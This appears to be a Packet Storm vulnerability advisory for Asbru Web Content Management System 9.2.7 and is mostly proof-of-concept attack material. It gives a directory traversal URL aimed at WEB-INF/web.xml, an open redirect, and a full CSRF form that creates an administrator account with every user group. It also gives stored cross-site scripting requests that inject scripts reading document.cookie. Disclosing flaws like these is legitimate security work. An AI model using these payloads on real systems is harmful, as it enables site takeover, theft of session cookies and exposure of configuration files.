Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

2016-04-06T00:00:00
ID PACKETSTORM:136591
Type packetstorm
Reporter LiquidWorm
Modified 2016-04-06T00:00:00

Description

                                        
                                            `  
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities  
  
  
Vendor: Asbru Ltd.  
Product web page: http://www.asbrusoft.com  
Affected version: 9.2.7  
  
Summary: Ready to use, full-featured, database-driven web content management  
system (CMS) with integrated community, databases, e-commerce and statistics  
modules for creating, publishing and managing rich and user-friendly Internet,  
Extranet and Intranet websites.  
  
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request  
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.  
  
Tested on : Apache Tomcat/5.5.23  
Apache/2.2.3 (CentOS)  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5314  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php  
  
  
09.03.2016  
  
--  
  
  
#1  
Directory Traversal:  
--------------------  
  
http://10.0.0.7/../../../../../WEB-INF/web.xml  
  
  
#2  
Open Redirect:  
--------------  
  
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk  
  
  
#3  
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):  
----------------------------------------------------------------------  
  
<html>  
<body>  
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">  
<input type="hidden" name="userinfo" value="   
<TEST></TEST>   
" />  
<input type="hidden" name="title" value="Mr" />  
<input type="hidden" name="name" value="Chekmidash" />  
<input type="hidden" name="organisation" value="ZSL" />  
<input type="hidden" name="email" value="test@testingus.io" />  
<input type="hidden" name="gender" value="1" />  
<input type="hidden" name="birthdate" value="1984-01-01" />  
<input type="hidden" name="birthday" value="01" />  
<input type="hidden" name="birthmonth" value="01" />  
<input type="hidden" name="birthyear" value="1984" />  
<input type="hidden" name="notes" value="CSRFNote" />  
<input type="hidden" name="userinfo1" value="" />  
<input type="hidden" name="userinfoname" value="" />  
<input type="hidden" name="username" value="hackedusername" />  
<input type="hidden" name="password" value="password123" />  
<input type="hidden" name="userclass" value="administrator" />  
<input type="hidden" name="usergroup" value="" />  
<input type="hidden" name="usertype" value="" />  
<input type="hidden" name="usergroups" value="Account Managers" />  
<input type="hidden" name="usergroups" value="Company Bloggers" />  
<input type="hidden" name="usergroups" value="Customer" />  
<input type="hidden" name="usergroups" value="Event Managers" />  
<input type="hidden" name="usergroups" value="Financial Officers" />  
<input type="hidden" name="usergroups" value="Forum Moderator" />  
<input type="hidden" name="usergroups" value="Human Resources" />  
<input type="hidden" name="usergroups" value="Intranet Managers" />  
<input type="hidden" name="usergroups" value="Intranet Users" />  
<input type="hidden" name="usergroups" value="Newsletter" />  
<input type="hidden" name="usergroups" value="Press Officers" />  
<input type="hidden" name="usergroups" value="Product Managers" />  
<input type="hidden" name="usergroups" value="Registered Users" />  
<input type="hidden" name="usergroups" value="Shop Managers" />  
<input type="hidden" name="usergroups" value="Subscribers" />  
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />  
<input type="hidden" name="usergroups" value="Support Ticket Users" />  
<input type="hidden" name="usergroups" value="User Managers" />  
<input type="hidden" name="usergroups" value="Website Administrators" />  
<input type="hidden" name="usergroups" value="Website Developers" />  
<input type="hidden" name="users_group" value="" />  
<input type="hidden" name="users_type" value="" />  
<input type="hidden" name="creators_group" value="" />  
<input type="hidden" name="creators_type" value="" />  
<input type="hidden" name="editors_group" value="" />  
<input type="hidden" name="editors_type" value="" />  
<input type="hidden" name="publishers_group" value="" />  
<input type="hidden" name="publishers_type" value="" />  
<input type="hidden" name="administrators_group" value="" />  
<input type="hidden" name="administrators_type" value="" />  
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />  
<input type="hidden" name="scheduled_publish_email" value="" />  
<input type="hidden" name="scheduled_notify" value="" />  
<input type="hidden" name="scheduled_notify_email" value="" />  
<input type="hidden" name="scheduled_unpublish" value="" />  
<input type="hidden" name="scheduled_unpublish_email" value="" />  
<input type="hidden" name="invoice_name" value="Icebreaker" />  
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />  
<input type="hidden" name="invoice_address" value="nu" />  
<input type="hidden" name="invoice_postalcode" value="1300" />  
<input type="hidden" name="invoice_city" value="Neverland" />  
<input type="hidden" name="invoice_state" value="ND" />  
<input type="hidden" name="invoice_country" value="ND" />  
<input type="hidden" name="invoice_phone" value="111-222-3333" />  
<input type="hidden" name="invoice_fax" value="" />  
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />  
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />  
<input type="hidden" name="delivery_name" value="" />  
<input type="hidden" name="delivery_organisation" value="" />  
<input type="hidden" name="delivery_address" value="" />  
<input type="hidden" name="delivery_postalcode" value="" />  
<input type="hidden" name="delivery_city" value="" />  
<input type="hidden" name="delivery_state" value="" />  
<input type="hidden" name="delivery_country" value="" />  
<input type="hidden" name="delivery_phone" value="" />  
<input type="hidden" name="delivery_fax" value="" />  
<input type="hidden" name="delivery_email" value="" />  
<input type="hidden" name="delivery_website" value="" />  
<input type="hidden" name="card_type" value="VISA" />  
<input type="hidden" name="card_number" value="4444333322221111" />  
<input type="hidden" name="card_issuedmonth" value="01" />  
<input type="hidden" name="card_issuedyear" value="2016" />  
<input type="hidden" name="card_expirymonth" value="01" />  
<input type="hidden" name="card_expiryyear" value="2100" />  
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />  
<input type="hidden" name="card_cvc" value="133" />  
<input type="hidden" name="card_issue" value="" />  
<input type="hidden" name="card_postalcode" value="1300" />  
<input type="hidden" name="content_editor" value="" />  
<input type="hidden" name="hardcore_upload" value="" />  
<input type="hidden" name="hardcore_format" value="" />  
<input type="hidden" name="hardcore_width" value="" />  
<input type="hidden" name="hardcore_height" value="" />  
<input type="hidden" name="hardcore_onenter" value="" />  
<input type="hidden" name="hardcore_onctrlenter" value="" />  
<input type="hidden" name="hardcore_onshiftenter" value="" />  
<input type="hidden" name="hardcore_onaltenter" value="" />  
<input type="hidden" name="hardcore_toolbar1" value="" />  
<input type="hidden" name="hardcore_toolbar2" value="" />  
<input type="hidden" name="hardcore_toolbar3" value="" />  
<input type="hidden" name="hardcore_toolbar4" value="" />  
<input type="hidden" name="hardcore_toolbar5" value="" />  
<input type="hidden" name="hardcore_formatblock" value="" />  
<input type="hidden" name="hardcore_fontname" value="" />  
<input type="hidden" name="hardcore_fontsize" value="" />  
<input type="hidden" name="hardcore_customscript" value="" />  
<input type="hidden" name="startpage" value="" />  
<input type="hidden" name="workspace_sections" value="" />  
<input type="hidden" name="index_workspace" value="" />  
<input type="hidden" name="index_content" value="" />  
<input type="hidden" name="index_library" value="" />  
<input type="hidden" name="index_product" value="" />  
<input type="hidden" name="index_stock" value="" />  
<input type="hidden" name="index_order" value="" />  
<input type="hidden" name="index_segments" value="" />  
<input type="hidden" name="index_usertests" value="" />  
<input type="hidden" name="index_heatmaps" value="" />  
<input type="hidden" name="index_user" value="" />  
<input type="hidden" name="index_websites" value="" />  
<input type="hidden" name="menu_selection" value="" />  
<input type="hidden" name="statistics_reports" value="" />  
<input type="hidden" name="sales_reports" value="" />  
<input type="submit" value="Initiate" />  
</form>  
</body>  
</html>  
  
  
#4  
Stored Cross-Site Scripting:  
----------------------------  
  
a)  
  
  
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1  
Host: 10.0.0.7  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="webeditor_stylesheet"  
  
/stylesheet.jsp?id=1,1&device=&useragent=&  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="restore"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="archive"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publish"  
  
Save & Publish  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="scheduled_publish"  
  
2016-03-09 13:29  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="scheduled_unpublish"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="checkedout"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="revision"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="title"  
  
"><script>alert(document.cookie)</script>  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="searchable"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="menuitem"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="file"; filename="test.svg"  
Content-Type: image/svg+xml  
  
testsvgxxefailed  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="file_data"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="server_filename"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentdelivery"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="image1"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="image2"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="image3"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="metainfo"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="segmentation"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="author"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="description"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="keywords"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="metainfoname"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="segmentationname"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="segmentationvalue"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentpackage"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentclass"  
  
image  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentgroup"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contenttype"  
  
Photos  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="version_master"  
  
0  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="version"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="device"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="usersegment"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="usertest"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="users_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="users_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="users_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="creators_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="creators_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="creators_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="editors_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="editors_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="editors_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publishers_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publishers_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publishers_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="developers_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="developers_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="developers_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="administrators_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="administrators_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="administrators_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_top"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_up"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_previous"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_next"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_first"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_last"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="related"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="selectrelated"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN--  
  
  
b)  
  
POST /webadmin/fileformats/create_post.jsp HTTP/1.1  
Host: 10.0.0.7  
  
filenameextension="><script>alert(document.cookie)</script>  
  
`